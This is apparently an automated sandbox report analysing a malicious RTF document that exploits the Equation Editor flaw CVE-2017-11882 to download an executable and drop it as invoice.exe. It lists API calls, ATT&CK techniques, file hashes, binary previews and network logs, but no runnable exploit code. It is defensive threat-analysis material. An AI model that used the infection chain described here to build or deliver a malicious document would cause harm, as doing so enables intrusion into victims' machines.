Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1700	Thread sleep time: -420000s >= -30000s			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1476	Thread sleep time: -120000s >= -30000s			Jump to behavior

Source: C:\Users\user\AppData\Roaming\invoice.exe

API coverage: 3.9 %

Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDCCFC0 GetWindowsDirectoryA,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,		4_2_000000013FDCCFC0
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDCD99F FindFirstFileA,FindClose,FindWindowA,		4_2_000000013FDCD99F

Source: C:\Users\user\AppData\Roaming\invoice.exe

Code function: 4_2_000000013FDE7814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

4_2_000000013FDE7814

Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDE7814 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		4_2_000000013FDE7814
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDD42BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		4_2_000000013FDD42BC

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\user\AppData\Roaming\invoice.exe "C:\Users\user\AppData\Roaming\invoice.exe"

Jump to behavior

Source: C:\Users\user\AppData\Roaming\invoice.exe

Code function: 4_2_000000013FDCE9AE LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorDacl,GetLastError,LocalFree,LocalFree,

4_2_000000013FDCE9AE

Source: C:\Users\user\AppData\Roaming\invoice.exe

Code function: 4_2_000000013FDCEB82 AllocateAndInitializeSid,AllocateAndInitializeSid,GetLastError,GetLastError,GetLastError,

4_2_000000013FDCEB82

Source: C:\Users\user\AppData\Roaming\invoice.exe

Code function: 4_2_000000013FDCD6E1 CreateNamedPipeA,

4_2_000000013FDCD6E1

Source: C:\Users\user\AppData\Roaming\invoice.exe

Code function: 4_2_000000013FDD0EDC GetLocalTime,

4_2_000000013FDD0EDC

Source: C:\Users\user\AppData\Roaming\invoice.exe

Code function: 4_2_000000013FDC9DC7 GetProcAddress,strchr,GetUserNameA,GetUserNameA,

4_2_000000013FDC9DC7

Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDCBEF2 socket,SetHandleInformation,setsockopt,getaddrinfo,htons,inet_addr,htonl,htonl,htons,bind,listen,closesocket,WSAGetLastError,closesocket,closesocket,WSAGetLastError,		4_2_000000013FDCBEF2
Source: C:\Users\user\AppData\Roaming\invoice.exe	Code function: 4_2_000000013FDCB9EF closesocket,socket,SetHandleInformation,setsockopt,setsockopt,setsockopt,htonl,htons,bind,WSAGetLastError,WSAGetLastError,htons,htonl,htons,connect,WSAGetLastError,		4_2_000000013FDCB9EF

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	Path Interception	12 Process Injection	1 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	13 Exploitation for Client Execution	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Modify Registry	LSASS Memory	1 Query Registry	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	2 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	1 Virtualization/Sandbox Evasion	Security Account Manager	1 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	12 Process Injection	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Scheduled Transfer	13 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Account Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Obfuscated Files or Information	Cached Domain Credentials	1 System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	1 Remote System Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	2 File and Directory Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	3 System Information Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
doc.doc	50%	Metadefender		Browse
doc.doc	55%	ReversingLabs	Document-Office.Exploit.CVE-2017-11882
doc.doc	100%	Avira	EXP/CVE-2017-11882.Gen

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe	0%	Metadefender	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe	0%	ReversingLabs
C:\Users\user\AppData\Roaming\invoice.exe	0%	Virustotal	Browse
C:\Users\user\AppData\Roaming\invoice.exe	0%	Metadefender	Browse
C:\Users\user\AppData\Roaming\invoice.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/	0%	URL Reputation	safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	0%	URL Reputation	safe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	0%	URL Reputation	safe
https://sectigo.com/CPS0D	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
the.earth.li	93.93.131.124	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://the.earth.li/~sgtatham/putty/latest/w64/putty.exe	false		high
https://the.earth.li/~sgtatham/putty/0.76/w64/putty.exe	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t	putty[1].exe.2.dr, invoice.exe.2.dr	false	URL Reputation: safe	unknown
https://github.com/llvm/llvm-project/	invoice.exe, invoice.exe, 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmp, invoice.exe, 00000004.00000000.468703589.000000013FDF8000.00000002.00000001.01000000.00000003.sdmp, putty[1].exe.2.dr, invoice.exe.2.dr	false		high
http://ocsp.sectigo.com0	putty[1].exe.2.dr, invoice.exe.2.dr	false	URL Reputation: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/	invoice.exe, 00000004.00000002.737447168.000000013FDF8000.00000002.00000001.01000000.00000003.sdmp, invoice.exe, 00000004.00000000.468703589.000000013FDF8000.00000002.00000001.01000000.00000003.sdmp, putty[1].exe.2.dr, invoice.exe.2.dr	false	URL Reputation: safe	unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0	putty[1].exe.2.dr, invoice.exe.2.dr	false	URL Reputation: safe	unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#	putty[1].exe.2.dr, invoice.exe.2.dr	false	URL Reputation: safe	unknown
https://sectigo.com/CPS0D	putty[1].exe.2.dr, invoice.exe.2.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
93.93.131.124	the.earth.li	United Kingdom		44684	MYTHICMythicBeastsLtdGB	false

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	594274
Start date and time:	2022-03-22 15:49:23 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	doc.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal96.expl.winDOC@5/6@1/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 40.2% (good quality ratio 35.5%) Quality average: 61.2% Quality standard deviation: 31.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Active ActiveX Object Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, svchost.exe
Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:50:53	API Interceptor	241x Sleep call for process: EQNEDT32.EXE modified
16:50:56	API Interceptor	748x Sleep call for process: invoice.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
93.93.131.124	lmfao.doc	Get hash	malicious	Browse	the.earth.li/~sgtatham/putty/0.63/x86/pscp.exe

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
the.earth.li	https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.76-installer.msi	Get hash	malicious	Browse	93.93.131.124
	1mixELaybY.exe	Get hash	malicious	Browse	93.93.131.124
	smphost.dll	Get hash	malicious	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Browse	93.93.131.124
	Microsoft Excel.xlsm	Get hash	malicious	Browse	93.93.131.124
	Microsoft Excel.xlsm	Get hash	malicious	Browse	93.93.131.124
	lmfao.doc	Get hash	malicious	Browse	93.93.131.124
	YOeg64zDX4.exe	Get hash	malicious	Browse	93.93.131.124
	payload.exe	Get hash	malicious	Browse	93.93.131.124
	do7ZLDDsHX.xls	Get hash	malicious	Browse	93.93.131.124
	https://e.coka.la/V42OO5.hta	Get hash	malicious	Browse	46.43.34.31
	https://e.coka.la/V42OO5.hta	Get hash	malicious	Browse	46.43.34.31
	Moving_list_of_the_day.xlsx	Get hash	malicious	Browse	46.43.34.31
	m.doc	Get hash	malicious	Browse	46.43.34.31
	m.doc	Get hash	malicious	Browse	46.43.34.31
	m.doc	Get hash	malicious	Browse	46.43.34.31
	Your_Invoice_4886.doc	Get hash	malicious	Browse	46.43.34.31
	Your_Invoice_4886.doc	Get hash	malicious	Browse	46.43.34.31

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MYTHICMythicBeastsLtdGB	https://the.earth.li/~sgtatham/putty/latest/w64/putty-64bit-0.76-installer.msi	Get hash	malicious	Browse	93.93.131.124
	1mixELaybY.exe	Get hash	malicious	Browse	93.93.131.124
	smphost.dll	Get hash	malicious	Browse	93.93.131.124
	arm7	Get hash	malicious	Browse	46.235.224.242
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Browse	93.93.131.124
	#U043a#U043d#U043e#U043f#U043a#U0430.xlsm	Get hash	malicious	Browse	93.93.131.124
	PO-(105152)-20610603_.PDF.exe	Get hash	malicious	Browse	46.235.230.162
	Microsoft Excel.xlsm	Get hash	malicious	Browse	93.93.131.124
	Microsoft Excel.xlsm	Get hash	malicious	Browse	93.93.131.124
	lmfao.doc	Get hash	malicious	Browse	93.93.131.124
	Ctr-975552-xlsx.HtmL	Get hash	malicious	Browse	176.126.246.96
	YOeg64zDX4.exe	Get hash	malicious	Browse	93.93.131.124
	payload.exe	Get hash	malicious	Browse	93.93.131.124

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	DTRSHgFFRx.xlsm	Get hash	malicious	Browse	93.93.131.124
	Bank_report111503.doc	Get hash	malicious	Browse	93.93.131.124
	sample20220322-01.xls	Get hash	malicious	Browse	93.93.131.124
	FAT_1.xls	Get hash	malicious	Browse	93.93.131.124
	GOODNEWS DEAR LUCKY WINNER CONGRATS!.docx	Get hash	malicious	Browse	93.93.131.124
	Purchase Order_pdf.ppa	Get hash	malicious	Browse	93.93.131.124
	test.xlsm	Get hash	malicious	Browse	93.93.131.124
	adjuntos_74.zls.xlsm	Get hash	malicious	Browse	93.93.131.124
	FILE_21032022.xlsm	Get hash	malicious	Browse	93.93.131.124
	B35O-18342.doc	Get hash	malicious	Browse	93.93.131.124
	P.O STT-2021-0337.doc	Get hash	malicious	Browse	93.93.131.124
	DOCUMENT ON FIREARMS.doc	Get hash	malicious	Browse	93.93.131.124
	File_32644720.xlsm	Get hash	malicious	Browse	93.93.131.124
	Info-85126848462.xlsm	Get hash	malicious	Browse	93.93.131.124
	Mail 21032022.xlsm	Get hash	malicious	Browse	93.93.131.124
	Purchase296256AR.xlsx	Get hash	malicious	Browse	93.93.131.124
	Rechnung-M#U00e4rz-2022.xlsm	Get hash	malicious	Browse	93.93.131.124
	adjuntos_7846522.xlsm	Get hash	malicious	Browse	93.93.131.124
	PG04768225837_202203211832.xlsm	Get hash	malicious	Browse	93.93.131.124
	scan_payment_advance.doc	Get hash	malicious	Browse	93.93.131.124

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\invoice.exe	1mixELaybY.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Zusy.386623.25484.dll	Get hash	malicious	Browse
	INV2021-04-08.doc	Get hash	malicious	Browse
	18.08.2021 Purchase Order.doc	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe	1mixELaybY.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Zusy.386623.25484.dll	Get hash	malicious	Browse
	INV2021-04-08.doc	Get hash	malicious	Browse
	18.08.2021 Purchase Order.doc	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\putty[1].exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	downloaded
Size (bytes):	1273576
Entropy (8bit):	7.019973467435708
Encrypted:	false
SSDEEP:	24576:+wIEES7sjMc3EQVdEDvLJPjraFLR5ROwwC:+rE/7MMc3Xajrkp/
MD5:	B3BB91AD96F2D4C041861CE59BA6AC73
SHA1:	E18C6FD6A0D0D5C124C9EF6972A76C47C28C80A3
SHA-256:	0581160998BE30F79BD9A0925A01B0EBC4CB94265DFA7F8DA1E2839BF0F1E426
SHA-512:	E3A8426D202A8AAD79AAD5D75549753CF70B9C2C0FA4C9468F03D089ECA8E529B56CD8FA16B7BE3A4CFC019D43FF458B9DC8A1CAE44B6ED75E27F21489A2CBDD
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 1mixELaybY.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Zusy.386623.25484.dll, Detection: malicious, Browse Filename: INV2021-04-08.doc, Detection: malicious, Browse Filename: 18.08.2021 Purchase Order.doc, Detection: malicious, Browse
Reputation:	low
IE Cache URL:	https://the.earth.li/~sgtatham/putty/0.76/w64/putty.exe
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....m.`.........."......j..........@E.........@....................................\|E....`.................................................(".......P.. 7......._...$...J..........................................0U..............h-...............................text...fh.......j.................. ..`.rdata...............n..............@..@.data....S...........d..............@....pdata..._.......`...r..............@..@.00cfg.......@......................@..@.rsrc... 7...P...8..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\doc.LNK

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:42:27 2022, mtime=Tue Mar 8 15:42:27 2022, atime=Tue Mar 22 22:50:49 2022, length=11309, window=hide
Category:	dropped
Size (bytes):	973
Entropy (8bit):	4.4840874003521325
Encrypted:	false
SSDEEP:	12:8Dbq0gXg/XAlCPCHaXWLBndLXB/yHX+WgEflb2f0Bxicvba8RDtZ3YilMMEpxRlP:8//XTildzUS22fOAehDv3qcm7b
MD5:	F70F5706FB5E8A9DDCFFB8DEDC39F9A8
SHA1:	4E3B2B67FB9C0D133EE5E4BE3FFA4D61DC155E67
SHA-256:	623526CAABFED0344EBF79E39A5DD5ECA15D9C5C9A02A018C4A297F06A8ED4FD
SHA-512:	97F3B50965CC49213646B11AC580A9548D3FE9C5D578876AC16ECFB613229180C674A844ADFA7D7C511A086C2A07FFD01E7C322BD6F5B7BE38AB3AB395CBD52B
Malicious:	false
Reputation:	low
Preview:	L..................F.... ...&....3..&....3......G>..-,...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hTO...user.8......QK.XhTO....&=....U...............A.l.b.u.s.....z.1.....hTQ...Desktop.d......QK.XhTQ...._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....R.2.-,..vTY. .doc.doc.<......hTN.hTN.....V....................d.o.c...d.o.c.......q...............-...8...[............?J......C:\Users\..#...................\\932923\Users.user\Desktop\doc.doc.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......932923..........D_....3N...W...9...N..... .....[D_....3N...W...9...N..... .....[....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	57
Entropy (8bit):	4.337128944582611
Encrypted:	false
SSDEEP:	3:bDuMJlZzCmX18GCv:bCSz2Gs
MD5:	5EA45C73983086FC03971DE6E5D4B714
SHA1:	08AD0FEE96295B153B378693A8FBDB9FBEA65C72
SHA-256:	5ADFFE0C4E172770CEBCAC2ECFB7E207D978509FF5503C2CA87DBC083EA2B493
SHA-512:	B261F83CB07FA5A91B7710C311A7176B1718626BD8A0B99AF6E14EC4D4CBAE55BCED45F663F63C2103B71C135BE1EBDF53F316A2F3E53AC23A7E845E8E448094
Malicious:	false
Reputation:	low
Preview:	[folders]..Templates.LNK=0..doc.LNK=0..[doc]..doc.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy1GlTeA0jMWrfcmOlln:vdsCkWt0yizjKl
MD5:	9177E48BA0F3C1B3EC06BBBF5F2D466D
SHA1:	F05EB975B0DCDD1384DF715ACFBF4D1C8CECEBB0
SHA-256:	2C3A9FCF3B5A4552727C3D02B65B8637E61EE27D2182610029A545BE76CFAAD5
SHA-512:	E263FA3580F4444FF9936314DD22E9D683347BAFEC614FA4233F14C0C2F94C2070B6963D8653D046C0096F3F549EB2294B2E2FBADDDD789135FEF17FE1A12168
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1Q..............2Q.............@3Q..............3Q.....z.......p4Q.....x...

C:\Users\user\AppData\Roaming\invoice.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1273576
Entropy (8bit):	7.019973467435708
Encrypted:	false
SSDEEP:	24576:+wIEES7sjMc3EQVdEDvLJPjraFLR5ROwwC:+rE/7MMc3Xajrkp/
MD5:	B3BB91AD96F2D4C041861CE59BA6AC73
SHA1:	E18C6FD6A0D0D5C124C9EF6972A76C47C28C80A3
SHA-256:	0581160998BE30F79BD9A0925A01B0EBC4CB94265DFA7F8DA1E2839BF0F1E426
SHA-512:	E3A8426D202A8AAD79AAD5D75549753CF70B9C2C0FA4C9468F03D089ECA8E529B56CD8FA16B7BE3A4CFC019D43FF458B9DC8A1CAE44B6ED75E27F21489A2CBDD
Malicious:	true
Antivirus:	Antivirus: Virustotal, Detection: 0%, Browse Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 1mixELaybY.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Variant.Zusy.386623.25484.dll, Detection: malicious, Browse Filename: INV2021-04-08.doc, Detection: malicious, Browse Filename: 18.08.2021 Purchase Order.doc, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....m.`.........."......j..........@E.........@....................................\|E....`.................................................(".......P.. 7......._...$...J..........................................0U..............h-...............................text...fh.......j.................. ..`.rdata...............n..............@..@.data....S...........d..............@....pdata..._.......`...r..............@..@.00cfg.......@......................@..@.rsrc... 7...P...8..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\Desktop\~$doc.doc

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.4797606462020307
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy1GlTeA0jMWrfcmOlln:vdsCkWt0yizjKl
MD5:	9177E48BA0F3C1B3EC06BBBF5F2D466D
SHA1:	F05EB975B0DCDD1384DF715ACFBF4D1C8CECEBB0
SHA-256:	2C3A9FCF3B5A4552727C3D02B65B8637E61EE27D2182610029A545BE76CFAAD5
SHA-512:	E263FA3580F4444FF9936314DD22E9D683347BAFEC614FA4233F14C0C2F94C2070B6963D8653D046C0096F3F549EB2294B2E2FBADDDD789135FEF17FE1A12168
Malicious:	true
Preview:	.user..................................................A.l.b.u.s.............p........1Q..............2Q.............@3Q..............3Q.....z.......p4Q.....x...

Static File Info

General

File type:	Rich Text Format data, version 1, unknown character set
Entropy (8bit):	4.461721135653026
TrID:	Rich Text Format (5005/1) 55.56% Rich Text Format (4004/1) 44.44%
File name:	doc.doc
File size:	11309
MD5:	c1f39c0b60ddf78da94b5ee7231dfe58
SHA1:	f415bcfe0db7e8f82cd7a12beb8e45e55c127126
SHA256:	48a35d8cff0fe7e815f69169ab8014767ecc307ac03f55110c47c7ed0185fe56
SHA512:	83d7f6941c9e907285aa0b81611c906c461e4d450ae63c9961ba26d28af19dfaeb0ee831fc97a9d866d01761e32b6e1cd05976b8cdda2db51cdc16cc71f604e1
SSDEEP:	192:XjRkXe7k8BL4htbGy4tAT0jWEHWhM7o7z9Riy5DeAVRD1fOaH2:XjRGe7kQkjz4OjdDRpsA3hOaH2
File Content Preview:	{\rtf11368`?<640#94\|55.]<'22=$_-@.,6.1'(?.:%;@+<_[5\|.?`+3+_.2?)'&()?%~[0@.!].[]?1'4#=0'!#=.-?-#?/,$.?`?(;<`[;9?$(8(.$<..[,:9?@.?.!9';)](6.8,231$:__>6+3#3%?%#32/?8@+[`\|%?$.@5.!%.?@<:%.(4`%?<>4,)'46%7\|!,)2\|\|9=.4\|?019?3?/?8!!.=1[0#/..51+?\|==3@.?`@@=<?.

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static RTF Info

Objects

Id	Start	Format ID	Format	Classname	Datasize	Filename	Sourcepath	Temppath	Exploit
0	00000FCBh	2	embedded	lINf5lw	3584				no

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 22, 2022 16:50:25.432349920 CET	49165	80	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:25.465516090 CET	80	49165	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:25.465707064 CET	49165	80	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:25.467176914 CET	49165	80	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:25.500174046 CET	80	49165	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:25.500972986 CET	80	49165	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:25.501111984 CET	49165	80	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:25.515666008 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:25.515712976 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:25.515811920 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:25.526559114 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:25.526592016 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:25.636579990 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:25.636770964 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:25.651465893 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:25.651492119 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:25.651901007 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:25.651984930 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.006345034 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.040707111 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.040792942 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.040862083 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.040887117 CET	443	49166	93.93.131.124	192.168.2.22
Mar 22, 2022 16:50:26.040899038 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.040934086 CET	49166	443	192.168.2.22	93.93.131.124
Mar 22, 2022 16:50:26.074160099 CET	443	49166	93.93.131.124	192.168.2.22
